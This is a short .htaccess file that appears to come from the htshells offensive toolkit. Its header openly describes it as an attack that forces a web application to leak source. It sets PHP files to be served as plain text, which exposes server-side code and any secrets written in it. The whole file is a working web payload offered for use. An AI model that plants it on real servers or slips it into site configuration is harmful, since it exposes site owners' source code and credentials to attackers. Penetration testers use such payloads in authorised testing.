0xBADCA7/htshells/master/info/mod_php.info.htaccess
# Attack a web application by forcing it to leak source - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
<FilesMatch ".ph.*$">
SetHandler text/plain
AddType text/plain .php
</FilesMatch>
Files
